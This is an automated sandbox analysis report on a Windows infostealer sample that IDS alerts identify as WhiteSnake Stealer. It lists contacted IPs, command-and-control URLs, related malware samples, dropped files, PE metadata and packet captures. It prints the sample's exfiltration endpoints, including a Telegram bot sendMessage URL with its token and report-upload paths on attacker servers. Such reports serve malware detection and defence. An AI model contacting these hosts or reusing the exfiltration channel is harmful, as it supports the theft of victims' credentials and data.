http://206.166.251.4	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://154.9.207.142:443	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://46.4.73.118	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://8.134.71.132:8082	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080/2r1j6_user	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.166.251.4:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ac.ecosia.org?q=	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.217.98.121:80802(	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.164.198.113:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://101.126.19.171:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://116.202.101.219:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.217.98.121	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20w	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://38.60.191.38:80	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://46.4.73.118:9000	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.217.98.121:8080/get	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.196.181.135/2r1j6_user%40358075_report.wsrp	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabv20	73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.tele	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://101.132.223.26:8080	73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
206.189.109.146	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
167.99.138.249	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
46.4.73.118	unknown	Germany	24940	HETZNER-ASDE	true
206.166.251.4	unknown	United States	7816	CTCUS	true
95.216.147.179	unknown	Germany	24940	HETZNER-ASDE	true
45.82.65.63	unknown	United Kingdom	208862	SIRINFO-ASIT	true
185.217.98.121	unknown	Israel	61102	INTERHOSTIL	true
5.196.181.135	unknown	France	16276	OVHFR	true
194.164.198.113	unknown	United Kingdom	8897	KCOM-SPNService-ProviderNetworkex-MistralGB	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640529
Start date and time:	2025-03-17 12:26:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	73ybGtnYXx.exe renamed because original name is a hash value
Original Sample Name:	ea08b197bbe8bc874a5c65500db03bf2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/2@3/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 15 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.242.39.171, 23.199.214.10
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:27:15	API Interceptor	837737x Sleep call for process: 73ybGtnYXx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	yeah.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	PO-2513203-PDF.js	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line?fields=query
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line?fields=query
	XWCTtOuD5e.exe	Get hash	malicious	Python Stealer, Exela Stealer, Njrat	Browse	ip-api.com/json
	WindowsDefender.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	Setup.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
	Planck Scale Lantern.exe	Get hash	malicious	PureLog Stealer, XWorm, zgRAT	Browse	ip-api.com/line/?fields=hosting
	Setup(1).exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	ExLoader_Installer.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	yeah.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	PO-2513203-PDF.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	XWCTtOuD5e.exe	Get hash	malicious	Python Stealer, Exela Stealer, Njrat	Browse	208.95.112.1
	WindowsDefender.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Setup.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	Planck Scale Lantern.exe	Get hash	malicious	PureLog Stealer, XWorm, zgRAT	Browse	208.95.112.1
	Setup(1).exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	ExLoader_Installer.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
api.telegram.org	Shipping Documents - SI078534.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Transaction_receipt520.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipment Document BL,INV and packing list.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	sryxen-built.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Shipping Documents - SI078534.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Transaction_receipt520.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipment Document BL,INV and packing list.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	sryxen-built.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
TUT-ASUS	yeah.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	PO-2513203-PDF.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	Q3N5HdmTIp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	XWCTtOuD5e.exe	Get hash	malicious	Python Stealer, Exela Stealer, Njrat	Browse	208.95.112.1
	WindowsDefender.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Setup.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	Planck Scale Lantern.exe	Get hash	malicious	PureLog Stealer, XWorm, zgRAT	Browse	208.95.112.1
	Setup(1).exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	ExLoader_Installer.exe	Get hash	malicious	Python Stealer, Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
DIGITALOCEAN-ASNUS	https://app.eraser.io/workspace/32c12MLUJSCjts5wfE3E?origin=share	Get hash	malicious	HTMLPhisher	Browse	138.197.132.229
	Spoofer.exe	Get hash	malicious	LodaRAT	Browse	206.189.80.59
	S6d0gHq1r3.elf	Get hash	malicious	Gafgyt, Mirai	Browse	95.85.2.23
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	104.248.130.66
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	134.122.7.16
	https://sheingivesback.com	Get hash	malicious	Unknown	Browse	64.225.91.73
	http://onllyfans.me/	Get hash	malicious	Unknown	Browse	128.199.106.47
	arm7.elf	Get hash	malicious	Mirai	Browse	5.101.107.92
	http://marina84.com/food/	Get hash	malicious	Unknown	Browse	165.227.200.87
	Bank_Statement.html	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253
DIGITALOCEAN-ASNUS	https://app.eraser.io/workspace/32c12MLUJSCjts5wfE3E?origin=share	Get hash	malicious	HTMLPhisher	Browse	138.197.132.229
	Spoofer.exe	Get hash	malicious	LodaRAT	Browse	206.189.80.59
	S6d0gHq1r3.elf	Get hash	malicious	Gafgyt, Mirai	Browse	95.85.2.23
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	104.248.130.66
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	134.122.7.16
	https://sheingivesback.com	Get hash	malicious	Unknown	Browse	64.225.91.73
	http://onllyfans.me/	Get hash	malicious	Unknown	Browse	128.199.106.47
	arm7.elf	Get hash	malicious	Mirai	Browse	5.101.107.92
	http://marina84.com/food/	Get hash	malicious	Unknown	Browse	165.227.200.87
	Bank_Statement.html	Get hash	malicious	HTMLPhisher	Browse	159.89.102.253

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	yeah.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Shipping Documents - SI078534.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Transaction_receipt520.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	sryxen-built.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	WizClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	149.154.167.220
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
c12f54a3f91dc7bafd92cb59fe009a35	captcha.txt.vbs	Get hash	malicious	Quasar	Browse	5.196.181.135
	test.vbs	Get hash	malicious	Quasar	Browse	5.196.181.135
	Ld0lvdQ1Rn.exe	Get hash	malicious	DCRat	Browse	5.196.181.135
	d6rzahY8IU.exe	Get hash	malicious	WhiteSnake Stealer	Browse	5.196.181.135
	KF2ZqmJMeN.exe	Get hash	malicious	DCRat	Browse	5.196.181.135
	nj.exe	Get hash	malicious	Quasar	Browse	5.196.181.135
	SQPKHjjgui.exe	Get hash	malicious	Unknown	Browse	5.196.181.135
	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	5.196.181.135
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	5.196.181.135
	Payload 94.75 (4).225.exe	Get hash	malicious	Kronos, Strela Stealer	Browse	5.196.181.135

Process:	C:\Users\user\Desktop\73ybGtnYXx.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
MD5:	1B713A2FD810C1C9A8F6F6BE36F406B1
SHA1:	0828576CB8B83C21F36AD29E327D845AB3574EBB
SHA-256:	E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
SHA-512:	D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\ucv4nuoh0h\report.lock

Download File

Process:	C:\Users\user\Desktop\73ybGtnYXx.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.284198358794784
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	73ybGtnYXx.exe
File size:	138'752 bytes
MD5:	ea08b197bbe8bc874a5c65500db03bf2
SHA1:	3cbe0f9a6bb6c1600e196d3c2b54132c72ccce0d
SHA256:	03423b8784cac66602f6dc04f6303668951e9c7280a80535a708d59e6cf82312
SHA512:	1baa6ee1970ae01c916d00a2727016a458d3bc6a43c9cfe707ccf73d687c190e88781a596661ee302feae53c5671f478a552177d74ce2a4334ad4daa5674bf10
SSDEEP:	1536:k3WaMTxYajhMDWWWxD4krrQz46vdszbLpQqVD9bMEqb01XTmUOr87dOPAUVHWHth:6ajYWCkrr3wdAbbD9bMEqo1AWz7bPCe
TLSH:	C2D3B496B2959FA1D99A8C7E81B25730037059068EC1FF0599DEF1902DC32C8EB176EF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............~0... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42307e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2302c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x70c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x21084	0x21200	8db6c509c98c5c3f9118b5242e181375	False	0.4103405070754717	data	5.2983432727316275	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x70c	0x800	3d1ccf36fbab49043c20d3ebe99828b4	False	0.43212890625	data	4.596375002443147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x26000	0xc	0x200	64a231074c74dcb4f33682cfbea21c3c	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x240a0	0x480	data			0.4895833333333333
RT_MANIFEST	0x24520	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments	b445b6dd35e4ee17ee3b5fb
CompanyName	ic03b1011c7a030ce0f5d187b78961c55a28cc1
FileDescription	idabae3fee05690001207aa
FileVersion	43.67.80.96
InternalName	p7eb73dd21c32df048b11.exe
LegalCopyright	f3bcc96e710689f2ee4fb
LegalTrademarks	oef5bca858f25bc5721dbaa
OriginalFilename	Sa7fafebc9f48c386e4a3247d7b5735aff07c.exe
ProductName	k0d4ec2dc9b83b45da8bce84637059f19
ProductVersion	12.64.98.84
Assembly Version	43.63.31.100

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-17T12:27:16.291521+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	49683	206.166.251.4	8080	TCP
2025-03-17T12:27:37.795494+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	49689	167.99.138.249	8080	TCP
2025-03-17T12:27:59.257897+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60233	46.4.73.118	9000	TCP
2025-03-17T12:28:00.860262+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60234	206.189.109.146	80	TCP
2025-03-17T12:28:22.291543+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60235	194.164.198.113	8080	TCP
2025-03-17T12:28:43.671509+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60236	45.82.65.63	80	TCP
2025-03-17T12:28:46.152010+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60238	95.216.147.179	80	TCP
2025-03-17T12:28:46.887962+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.8	60239	185.217.98.121	8080	TCP
2025-03-17T12:28:48.548401+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.8	60240	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 12:27:15.011513948 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:15.016297102 CET	80	49682	208.95.112.1	192.168.2.8
Mar 17, 2025 12:27:15.016413927 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:15.017497063 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:15.022170067 CET	80	49682	208.95.112.1	192.168.2.8
Mar 17, 2025 12:27:15.471684933 CET	80	49682	208.95.112.1	192.168.2.8
Mar 17, 2025 12:27:15.521228075 CET	49682	80	192.168.2.8	208.95.112.1
Mar 17, 2025 12:27:15.889247894 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:15.894190073 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:15.894284010 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:15.894418955 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:15.899091005 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.240797997 CET	49683	8080	192.168.2.8	206.166.251.4
Mar 17, 2025 12:27:16.246046066 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246059895 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246072054 CET	8080	49683	206.166.251.4	192.168.2.8
Mar 17, 2025 12:27:16.246082067 CET	8080	49683	206.166.251.4	192.168.2.8
